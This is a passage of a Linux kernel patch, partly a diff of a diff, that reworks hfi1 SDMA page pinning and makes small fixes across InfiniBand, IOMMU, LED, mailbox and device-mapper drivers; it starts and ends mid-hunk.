++			/*
++			 * This entry covers at least part of the region. If it doesn't extend
++			 * to the end, then this will be called again for the next segment.
++			 */
++			*node_p = node;
++			return 0;
++		}
++
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
++			 node->rb.addr, atomic_read(&node->refcount));
++		prepend_len = node->rb.addr - start;
++
++		/*
++		 * This node will not be returned; instead, a new node
++		 * will be. So release the reference.
++		 */
++		release_node(handler, node);
++
++		/* Prepend a node to cover the beginning of the allocation */
++		ret = add_system_pinning(req, node_p, start, prepend_len);
++		if (ret == -EEXIST) {
++			/* Another execution context has inserted a conflicting entry first. */
++			continue;
++		}
++		return ret;
++	}
++}
++
++static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
++				      struct user_sdma_txreq *tx,
++				      struct sdma_mmu_node *cache_entry,
++				      size_t start,
++				      size_t from_this_cache_entry)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	unsigned int page_offset;
++	unsigned int from_this_page;
++	size_t page_index;
++	void *ctx;
++	int ret;
++
++	/*
++	 * Because the cache may be more fragmented than the memory that is being accessed,
++	 * it's not strictly necessary to have a descriptor per cache entry.
++	 */
++
++	while (from_this_cache_entry) {
++		page_index = PFN_DOWN(start - cache_entry->rb.addr);
++
++		if (page_index >= cache_entry->npages) {
++			SDMA_DBG(req,
++				 "Request for page_index %zu >= cache_entry->npages %u",
++				 page_index, cache_entry->npages);
++			return -EINVAL;
++		}
++
++		page_offset = start - ALIGN_DOWN(start, PAGE_SIZE);
++		from_this_page = PAGE_SIZE - page_offset;
++
++		if (from_this_page < from_this_cache_entry) {
++			ctx = NULL;
++		} else {
++			/*
++			 * In the case they are equal, the next line has no practical
++			 * effect, but it's better to do a register-to-register copy
++			 * than a conditional branch.
++			 */
++			from_this_page = from_this_cache_entry;
++			ctx = cache_entry;
++		}
++
++		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++				      cache_entry->pages[page_index],
++				      page_offset, from_this_page);
++		if (ret) {
++			/*
++			 * When there's a failure, the entire request is freed by
++			 * user_sdma_send_pkts().
++			 */
++			SDMA_DBG(req,
++				 "sdma_txadd_page failed %d page_index %lu page_offset %u from_this_page %u",
++				 ret, page_index, page_offset, from_this_page);
++			return ret;
++		}
++		start += from_this_page;
++		from_this_cache_entry -= from_this_page;
++	}
++	return 0;
++}
++
++static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   size_t from_this_iovec)
++{
++	struct mmu_rb_handler *handler = req->pq->handler;
++
++	while (from_this_iovec > 0) {
++		struct sdma_mmu_node *cache_entry;
++		size_t from_this_cache_entry;
++		size_t start;
++		int ret;
++
++		start = (uintptr_t)iovec->iov.iov_base + iovec->offset;
++		ret = get_system_cache_entry(req, &cache_entry, start,
++					     from_this_iovec);
++		if (ret) {
++			SDMA_DBG(req, "pin system segment failed %d", ret);
++			return ret;
++		}
++
++		from_this_cache_entry = cache_entry->rb.len - (start - cache_entry->rb.addr);
++		if (from_this_cache_entry > from_this_iovec)
++			from_this_cache_entry = from_this_iovec;
++
++		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
++						 from_this_cache_entry);
++		if (ret) {
++			/*
++			 * We're guaranteed that there will be no descriptor
++			 * completion callback that releases this node
++			 * because only the last descriptor referencing it
++			 * has a context attached, and a failure means the
++			 * last descriptor was never added.
++			 */
++			release_node(handler, cache_entry);
++			SDMA_DBG(req, "add system segment failed %d", ret);
++			return ret;
++		}
++
++		iovec->offset += from_this_cache_entry;
++		from_this_iovec -= from_this_cache_entry;
++	}
++
++	return 0;
++}
++
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_data_remaining)
++{
++	size_t remaining_to_add = *pkt_data_remaining;
++	/*
++	 * Walk through iovec entries, ensure the associated pages
++	 * are pinned and mapped, add data to the packet until no more
++	 * data remains to be added.
++	 */
++	while (remaining_to_add > 0) {
++		struct user_sdma_iovec *cur_iovec;
++		size_t from_this_iovec;
++		int ret;
++
++		cur_iovec = iovec;
++		from_this_iovec = iovec->iov.iov_len - iovec->offset;
++
++		if (from_this_iovec > remaining_to_add) {
++			from_this_iovec = remaining_to_add;
++		} else {
++			/* The current iovec entry will be consumed by this pass. */
++			req->iov_idx++;
++			iovec++;
++		}
++
++		ret = add_system_iovec_to_sdma_packet(req, tx, cur_iovec,
++						      from_this_iovec);
++		if (ret)
++			return ret;
++
++		remaining_to_add -= from_this_iovec;
++	}
++	*pkt_data_remaining = remaining_to_add;
++
++	return 0;
++}
++
++void system_descriptor_complete(struct hfi1_devdata *dd,
++				struct sdma_desc *descp)
++{
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx) {
++		struct sdma_mmu_node *node = descp->pinning_ctx;
++
++		release_node(node->rb.handler, node);
++	}
++}
++
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+@@ -1493,8 +1666,7 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
+ 	struct sdma_mmu_node *node =
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 
+-	unpin_sdma_pages(node);
+-	kfree(node);
++	free_system_node(node);
+ }
+ 
+ static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index ea56eb57e6568..a241836371dc1 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -112,16 +112,11 @@ struct sdma_mmu_node {
+ struct user_sdma_iovec {
+ 	struct list_head list;
+ 	struct iovec iov;
+-	/* number of pages in this vector */
+-	unsigned int npages;
+-	/* array of pinned pages for this vector */
+-	struct page **pages;
+ 	/*
+ 	 * offset into the virtual address space of the vector at
+ 	 * which we last left off.
+ 	 */
+ 	u64 offset;
+-	struct sdma_mmu_node *node;
+ };
+ 
+ /* evict operation argument */
+diff --git a/drivers/infiniband/hw/hfi1/verbs.c b/drivers/infiniband/hw/hfi1/verbs.c
+index e6e17984553c0..39ca32d9ae6a5 100644
+--- a/drivers/infiniband/hw/hfi1/verbs.c
++++ b/drivers/infiniband/hw/hfi1/verbs.c
+@@ -778,8 +778,8 @@ static int build_verbs_tx_desc(
+ 
+ 	/* add icrc, lt byte, and padding to flit */
+ 	if (extra_bytes)
+-		ret = sdma_txadd_daddr(sde->dd, &tx->txreq,
+-				       sde->dd->sdma_pad_phys, extra_bytes);
++		ret = sdma_txadd_daddr(sde->dd, &tx->txreq, sde->dd->sdma_pad_phys,
++				       extra_bytes);
+ 
+ bail_txadd:
+ 	return ret;
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index c3f0f8d877c37..727eedfba332a 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,6 +64,7 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
++				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index b17d6ebc5b705..488c906c0432c 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -412,9 +412,13 @@ static int set_user_sq_size(struct mlx4_ib_dev *dev,
+ 			    struct mlx4_ib_qp *qp,
+ 			    struct mlx4_ib_create_qp *ucmd)
+ {
++	u32 cnt;
++
+ 	/* Sanity check SQ size before proceeding */
+-	if ((1 << ucmd->log_sq_bb_count) > dev->dev->caps.max_wqes	 ||
+-	    ucmd->log_sq_stride >
++	if (check_shl_overflow(1, ucmd->log_sq_bb_count, &cnt) ||
++	    cnt > dev->dev->caps.max_wqes)
++		return -EINVAL;
++	if (ucmd->log_sq_stride >
+ 		ilog2(roundup_pow_of_two(dev->dev->caps.max_sq_desc_sz)) ||
+ 	    ucmd->log_sq_stride < MLX4_IB_MIN_SQ_STRIDE)
+ 		return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index 2211a0be16f36..f8e2baed27a5c 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -666,7 +666,21 @@ static bool devx_is_valid_obj_id(struct uverbs_attr_bundle *attrs,
+ 				      obj_id;
+ 
+ 	case MLX5_IB_OBJECT_DEVX_OBJ:
+-		return ((struct devx_obj *)uobj->object)->obj_id == obj_id;
++	{
++		u16 opcode = MLX5_GET(general_obj_in_cmd_hdr, in, opcode);
++		struct devx_obj *devx_uobj = uobj->object;
++
++		if (opcode == MLX5_CMD_OP_QUERY_FLOW_COUNTER &&
++		    devx_uobj->flow_counter_bulk_size) {
++			u64 end;
++
++			end = devx_uobj->obj_id +
++				devx_uobj->flow_counter_bulk_size;
++			return devx_uobj->obj_id <= obj_id && end > obj_id;
++		}
++
++		return devx_uobj->obj_id == obj_id;
++	}
+ 
+ 	default:
+ 		return false;
+@@ -1517,10 +1531,17 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_DEVX_OBJ_CREATE)(
+ 		goto obj_free;
+ 
+ 	if (opcode == MLX5_CMD_OP_ALLOC_FLOW_COUNTER) {
+-		u8 bulk = MLX5_GET(alloc_flow_counter_in,
+-				   cmd_in,
+-				   flow_counter_bulk);
+-		obj->flow_counter_bulk_size = 128UL * bulk;
++		u32 bulk = MLX5_GET(alloc_flow_counter_in,
++				    cmd_in,
++				    flow_counter_bulk_log_size);
++
++		if (bulk)
++			bulk = 1 << bulk;
++		else
++			bulk = 128UL * MLX5_GET(alloc_flow_counter_in,
++						cmd_in,
++						flow_counter_bulk);
++		obj->flow_counter_bulk_size = bulk;
+ 	}
+ 
+ 	uobj->object = obj;
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index cf953d23d18da..f7d3643b08f50 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4408,7 +4408,7 @@ static int mlx5_ib_modify_dct(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			return -EINVAL;
+ 
+ 		if (attr->port_num == 0 ||
+-		    attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports)) {
++		    attr->port_num > dev->num_ports) {
+ 			mlx5_ib_dbg(dev, "invalid port number %d. number of ports is %d\n",
+ 				    attr->port_num, dev->num_ports);
+ 			return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/umr.c b/drivers/infiniband/hw/mlx5/umr.c
+index d5105b5c9979b..cb5cee3dee2b6 100644
+--- a/drivers/infiniband/hw/mlx5/umr.c
++++ b/drivers/infiniband/hw/mlx5/umr.c
+@@ -380,6 +380,9 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 				       struct mlx5_mkey_seg *seg,
+ 				       unsigned int access_flags)
+ {
++	bool ro_read = (access_flags & IB_ACCESS_RELAXED_ORDERING) &&
++		       pcie_relaxed_ordering_enabled(dev->mdev->pdev);
++
+ 	MLX5_SET(mkc, seg, a, !!(access_flags & IB_ACCESS_REMOTE_ATOMIC));
+ 	MLX5_SET(mkc, seg, rw, !!(access_flags & IB_ACCESS_REMOTE_WRITE));
+ 	MLX5_SET(mkc, seg, rr, !!(access_flags & IB_ACCESS_REMOTE_READ));
+@@ -387,8 +390,7 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 	MLX5_SET(mkc, seg, lr, 1);
+ 	MLX5_SET(mkc, seg, relaxed_ordering_write,
+ 		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
+-	MLX5_SET(mkc, seg, relaxed_ordering_read,
+-		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
++	MLX5_SET(mkc, seg, relaxed_ordering_read, ro_read);
+ }
+ 
+ int mlx5r_umr_rereg_pd_access(struct mlx5_ib_mr *mr, struct ib_pd *pd,
+diff --git a/drivers/infiniband/sw/rdmavt/qp.c b/drivers/infiniband/sw/rdmavt/qp.c
+index 3acab569fbb94..2bdc4486c3daa 100644
+--- a/drivers/infiniband/sw/rdmavt/qp.c
++++ b/drivers/infiniband/sw/rdmavt/qp.c
+@@ -464,8 +464,6 @@ void rvt_qp_exit(struct rvt_dev_info *rdi)
+ 	if (qps_inuse)
+ 		rvt_pr_err(rdi, "QP memory leak! %u still in use\n",
+ 			   qps_inuse);
+-	if (!rdi->qp_dev)
+-		return;
+ 
+ 	kfree(rdi->qp_dev->qp_table);
+ 	free_qpn_table(&rdi->qp_dev->qpn_table);
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index dacc174604bf2..65b5cda5457ba 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -437,9 +437,6 @@ static int siw_netdev_event(struct notifier_block *nb, unsigned long event,
+ 
+ 	dev_dbg(&netdev->dev, "siw: event %lu\n", event);
+ 
+-	if (dev_net(netdev) != &init_net)
+-		return NOTIFY_OK;
+-
+ 	base_dev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_SIW);
+ 	if (!base_dev)
+ 		return NOTIFY_OK;
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 05052b49107f2..6bb9e9e81ff4c 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -558,7 +558,7 @@ static int siw_tx_hdt(struct siw_iwarp_tx *c_tx, struct socket *s)
+ 			data_len -= plen;
+ 			fp_off = 0;
+ 
+-			if (++seg > (int)MAX_ARRAY) {
++			if (++seg >= (int)MAX_ARRAY) {
+				siw_dbg_qp(tx_qp(c_tx), "too many fragments\n");
+ 				siw_unmap_pages(iov, kmap_mask, seg-1);
+ 				wqe->processed -= c_tx->bytes_unsent;
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index b360a1527cd10..7cca171478a22 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2507,8 +2507,8 @@ isert_wait4cmds(struct iscsit_conn *conn)
+ 	isert_info("iscsit_conn %p\n", conn);
+ 
+ 	if (conn->sess) {
+-		target_stop_session(conn->sess->se_sess);
+-		target_wait_for_sess_cmds(conn->sess->se_sess);
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 3c3fae738c3ed..25e799dba999e 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -549,6 +549,7 @@ static int srpt_format_guid(char *buf, unsigned int size, const __be64 *guid)
+  */
+ static int srpt_refresh_port(struct srpt_port *sport)
+ {
++	struct ib_mad_agent *mad_agent;
+ 	struct ib_mad_reg_req reg_req;
+ 	struct ib_port_modify port_modify;
+ 	struct ib_port_attr port_attr;
+@@ -593,24 +594,26 @@ static int srpt_refresh_port(struct srpt_port *sport)
+ 		set_bit(IB_MGMT_METHOD_GET, reg_req.method_mask);
+ 		set_bit(IB_MGMT_METHOD_SET, reg_req.method_mask);
+ 
+-		sport->mad_agent = ib_register_mad_agent(sport->sdev->device,
+-							 sport->port,
+-							 IB_QPT_GSI,
+-							 &reg_req, 0,
+-							 srpt_mad_send_handler,
+-							 srpt_mad_recv_handler,
+-							 sport, 0);
+-		if (IS_ERR(sport->mad_agent)) {
++		mad_agent = ib_register_mad_agent(sport->sdev->device,
++						  sport->port,
++						  IB_QPT_GSI,
++						  &reg_req, 0,
++						  srpt_mad_send_handler,
++						  srpt_mad_recv_handler,
++						  sport, 0);
++		if (IS_ERR(mad_agent)) {
+ 			pr_err("%s-%d: MAD agent registration failed (%ld). Note: this is expected if SR-IOV is enabled.\n",
+ 			       dev_name(&sport->sdev->device->dev), sport->port,
+-			       PTR_ERR(sport->mad_agent));
++			       PTR_ERR(mad_agent));
+ 			sport->mad_agent = NULL;
+ 			memset(&port_modify, 0, sizeof(port_modify));
+ 			port_modify.clr_port_cap_mask = IB_PORT_DEVICE_MGMT_SUP;
+ 			ib_modify_port(sport->sdev->device, sport->port, 0,
+ 				       &port_modify);
+-
++			return 0;
+ 		}
++
++		sport->mad_agent = mad_agent;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/input/touchscreen/raspberrypi-ts.c b/drivers/input/touchscreen/raspberrypi-ts.c
+index 5000f5fd9ec38..45c575df994e0 100644
+--- a/drivers/input/touchscreen/raspberrypi-ts.c
++++ b/drivers/input/touchscreen/raspberrypi-ts.c
+@@ -134,7 +134,7 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	fw = rpi_firmware_get(fw_node);
++	fw = devm_rpi_firmware_get(&pdev->dev, fw_node);
+ 	of_node_put(fw_node);
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+@@ -160,7 +160,6 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 	touchbuf = (u32)ts->fw_regs_phys;
+ 	error = rpi_firmware_property(fw, RPI_FIRMWARE_FRAMEBUFFER_SET_TOUCHBUF,
+ 				      &touchbuf, sizeof(touchbuf));
+-	rpi_firmware_put(fw);
+ 	if (error || touchbuf != 0) {
+ 		dev_warn(dev, "Failed to set touchbuf, %d\n", error);
+ 		return error;
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 6a9e6b563320b..9047481fafd48 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -11,7 +11,6 @@
+ #include <linux/of_device.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+-#include <linux/pm_domain.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+ 
+@@ -499,12 +498,6 @@ regmap_done:
+ 	if (ret)
+ 		return ret;
+ 
+-	if (desc->has_bus_pd) {
+-		ret = dev_pm_domain_attach(dev, true);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	provider = &qp->provider;
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+diff --git a/drivers/interconnect/qcom/icc-rpm.h b/drivers/interconnect/qcom/icc-rpm.h
+index a49af844ab13e..02257b0d3d5c6 100644
+--- a/drivers/interconnect/qcom/icc-rpm.h
++++ b/drivers/interconnect/qcom/icc-rpm.h
+@@ -91,7 +91,6 @@ struct qcom_icc_desc {
+ 	size_t num_nodes;
+ 	const char * const *clocks;
+ 	size_t num_clocks;
+-	bool has_bus_pd;
+ 	enum qcom_icc_type type;
+ 	const struct regmap_config *regmap_cfg;
+ 	unsigned int qos_offset;
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index 25a1a32bc611f..14efd2761b7ab 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -1823,7 +1823,6 @@ static const struct qcom_icc_desc msm8996_a0noc = {
+ 	.num_nodes = ARRAY_SIZE(a0noc_nodes),
+ 	.clocks = bus_a0noc_clocks,
+ 	.num_clocks = ARRAY_SIZE(bus_a0noc_clocks),
+-	.has_bus_pd = true,
+ 	.regmap_cfg = &msm8996_a0noc_regmap_config
+ };
+ 
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 1d0a70c85333a..5ecc17240eff5 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -1002,8 +1002,8 @@ struct amd_ir_data {
+ 	 */
+ 	struct irq_cfg *cfg;
+ 	int ga_vector;
+-	int ga_root_ptr;
+-	int ga_tag;
++	u64 ga_root_ptr;
++	u32 ga_tag;
+ };
+ 
+ struct amd_irte_ops {
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 20adb9b323d82..26fb78003889f 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1657,10 +1657,6 @@ static void do_attach(struct iommu_dev_data *dev_data,
+ 	domain->dev_iommu[iommu->index] += 1;
+ 	domain->dev_cnt                 += 1;
+ 
+-	/* Override supported page sizes */
+-	if (domain->flags & PD_GIOV_MASK)
+-		domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
+-
+ 	/* Update device table */
+ 	set_dte_entry(iommu, dev_data->devid, domain,
+ 		      ats, dev_data->iommu_v2);
+@@ -2039,6 +2035,8 @@ static int protection_domain_init_v2(struct protection_domain *domain)
+ 
+ 	domain->flags |= PD_GIOV_MASK;
+ 
++	domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
++
+ 	if (domain_enable_v2(domain, 1)) {
+ 		domain_id_free(domain->id);
+ 		return -ENOMEM;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index bfb2f163c6914..2bcd1f23d07d2 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1912,8 +1912,13 @@ static struct iommu_domain *__iommu_domain_alloc(struct bus_type *bus,
+ 		return NULL;
+ 
+ 	domain->type = type;
+-	/* Assume all sizes by default; the driver may override this later */
+-	domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++	/*
++	 * If not already set, assume all sizes by default; the driver
++	 * may override this later
++	 */
++	if (!domain->pgsize_bitmap)
++		domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++
+ 	if (!domain->ops)
+ 		domain->ops = bus->iommu_ops->default_domain_ops;
+ 
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 56d007582b6fa..e93ca9dc37c8e 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1237,6 +1237,14 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 			return PTR_ERR(data->bclk);
+ 	}
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, PGTABLE_PA_35_EN)) {
++		ret = dma_set_mask(dev, DMA_BIT_MASK(35));
++		if (ret) {
++			dev_err(dev, "Failed to set dma_mask 35.\n");
++			return ret;
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 
+ 	if (MTK_IOMMU_IS_TYPE(data->plat_data, MTK_IOMMU_TYPE_MM)) {
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 499d0f215a8bf..2378cfb7443e4 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -814,7 +814,7 @@ config LEDS_SPI_BYTE
+ config LEDS_TI_LMU_COMMON
+ 	tristate "LED driver for TI LMU"
+ 	depends on LEDS_CLASS
+-	depends on REGMAP
++	select REGMAP
+ 	help
+ 	  Say Y to enable the LED driver for TI LMU devices.
+ 	  This supports common features between the TI LM3532, LM3631, LM3632,
+diff --git a/drivers/leds/leds-tca6507.c b/drivers/leds/leds-tca6507.c
+index 161bef65c6b7b..62a968613cc37 100644
+--- a/drivers/leds/leds-tca6507.c
++++ b/drivers/leds/leds-tca6507.c
+@@ -691,8 +691,9 @@ tca6507_led_dt_init(struct device *dev)
+ 		if (fwnode_property_read_string(child, "label", &led.name))
+ 			led.name = fwnode_get_name(child);
+ 
+-		fwnode_property_read_string(child, "linux,default-trigger",
+-					    &led.default_trigger);
++		if (fwnode_property_read_string(child, "linux,default-trigger",
++						&led.default_trigger))
++			led.default_trigger = NULL;
+ 
+ 		led.flags = 0;
+ 		if (fwnode_property_match_string(child, "compatible",
+diff --git a/drivers/macintosh/Kconfig b/drivers/macintosh/Kconfig
+index 539a2ed4e13dc..a0e717a986dcb 100644
+--- a/drivers/macintosh/Kconfig
++++ b/drivers/macintosh/Kconfig
+@@ -86,6 +86,7 @@ config ADB_PMU_LED
+ 
+ config ADB_PMU_LED_DISK
+ 	bool "Use front LED as DISK LED by default"
++	depends on ATA
+ 	depends on ADB_PMU_LED
+ 	depends on LEDS_CLASS
+ 	select LEDS_TRIGGERS
+diff --git a/drivers/macintosh/windfarm_smu_sat.c b/drivers/macintosh/windfarm_smu_sat.c
+index be5d4593db93e..98fb31e00e203 100644
+--- a/drivers/macintosh/windfarm_smu_sat.c
++++ b/drivers/macintosh/windfarm_smu_sat.c
+@@ -171,6 +171,7 @@ static void wf_sat_release(struct kref *ref)
+ 
+ 	if (sat->nr >= 0)
+ 		sats[sat->nr] = NULL;
++	of_node_put(sat->node);
+ 	kfree(sat);
+ }
+ 
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index 853901acaeec2..08aa840cccaca 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -79,6 +79,13 @@ static bool mpfs_mbox_busy(struct mpfs_mbox *mbox)
+ 	return status & SCB_STATUS_BUSY_MASK;
+ }
+ 
++static bool mpfs_mbox_last_tx_done(struct mbox_chan *chan)
++{
++	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
++
++	return !mpfs_mbox_busy(mbox);
++}
++
+ static int mpfs_mbox_send_data(struct mbox_chan *chan, void *data)
+ {
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+@@ -182,7 +189,6 @@ static irqreturn_t mpfs_mbox_inbox_isr(int irq, void *data)
+ 
+ 	mpfs_mbox_rx_data(chan);
+ 
+-	mbox_chan_txdone(chan, 0);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -212,6 +218,7 @@ static const struct mbox_chan_ops mpfs_mbox_ops = {
+ 	.send_data = mpfs_mbox_send_data,
+ 	.startup = mpfs_mbox_startup,
+ 	.shutdown = mpfs_mbox_shutdown,
++	.last_tx_done = mpfs_mbox_last_tx_done,
+ };
+ 
+ static int mpfs_mbox_probe(struct platform_device *pdev)
+@@ -247,7 +254,8 @@ static int mpfs_mbox_probe(struct platform_device *pdev)
+ 	mbox->controller.num_chans = 1;
+ 	mbox->controller.chans = mbox->chans;
+ 	mbox->controller.ops = &mpfs_mbox_ops;
+-	mbox->controller.txdone_irq = true;
++	mbox->controller.txdone_poll = true;
++	mbox->controller.txpoll_period = 10u;
+ 
+ 	ret = devm_mbox_controller_register(&pdev->dev, &mbox->controller);
+ 	if (ret) {
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 12e004ff1a147..e02a4a18e8c29 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -152,7 +152,7 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 	struct zynqmp_ipi_message *msg;
+ 	u64 arg0, arg3;
+ 	struct arm_smccc_res res;
+-	int ret, i;
++	int ret, i, status = IRQ_NONE;
+ 
+ 	(void)irq;
+ 	arg0 = SMC_IPI_MAILBOX_STATUS_ENQUIRY;
+@@ -170,11 +170,11 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 				memcpy_fromio(msg->data, mchan->req_buf,
+ 					      msg->len);
+ 				mbox_chan_received_data(chan, (void *)msg);
+-				return IRQ_HANDLED;
++				status = IRQ_HANDLED;
+ 			}
+ 		}
+ 	}
+-	return IRQ_NONE;
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 29e0b85eeaf09..e088081b7a8ad 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -2205,6 +2205,7 @@ static int __init dm_clone_init(void)
+ 	r = dm_register_target(&clone_target);
+ 	if (r < 0) {
+ 		DMERR("Failed to register clone target");
++		kmem_cache_destroy(_hydration_cache);
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 7efbdb42cf3b4..3b34270ce607e 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -124,9 +124,9 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			 * Direction r or w?
+ 			 */
+ 			arg_name = dm_shift_arg(as);
+-			if (!strcasecmp(arg_name, "w"))
++			if (arg_name && !strcasecmp(arg_name, "w"))
+ 				fc->corrupt_bio_rw = WRITE;
+-			else if (!strcasecmp(arg_name, "r"))
